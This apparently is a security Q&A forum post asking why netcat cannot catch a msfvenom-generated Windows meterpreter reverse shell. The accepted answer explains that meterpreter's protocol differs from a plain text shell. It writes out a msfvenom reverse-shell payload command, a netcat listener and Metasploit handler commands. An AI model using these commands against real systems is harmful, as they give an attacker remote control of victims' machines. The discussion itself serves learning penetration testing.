# Connect msfvenom reverse shell without metasploit

Tags: penetration-test, metasploit, reverse-shell, netcat

For most reverse shell [here](http://pentestmonkey.net/cheat-sheet/shells/reverse-shell-cheat-sheet), I can simply use netcat to connect:

```
nc -nlvp 1234
```

But for reverse shell created by **msfvenom**, for example:

```
msfvenom -p windows/meterpreter/reverse_tcp LHOST=10.10.14.7 LPORT=4444 -f aspx
```

I CANNOT use netcat to connect.

Instead, use **msfconsole** to connect:

```
use exploit/multi/handler
set payload windows/meterpreter/reverse_tcp
```

Question:

Why netcat is NOT working here?

To connect reverse shell created by msfvenom, any other way than metasploit?

Answer (score 6, accepted):

> Why netcat is NOT working here?
>
> To connect reverse shell created by msfvenom, any other way than
> metasploit?

That's because you are generating a fully fledged meterpreter payload and using that is extremely different from a simple reverse shell. A simple reverse shell is a just a textual access to the cmd/bash but a fully fledged meterpreter payload contains not just shell access but also all kinds of other commands sending and receiving. In simple terms netcat cannot interact on a text basis with meterpreter. You could use the `shell_reverse_tcp` payload instead of meterpreter and then receive a connect back to netcat but not with `meterpreter/reverse_tcp`.

Comment: "full fledged payload" and "Fully Interactive TTY shell" are also different?

Comment: yes,fully interactive TTY shell is also just a shell access

Comment: @TJCLK the payload in this case is Meterpreter.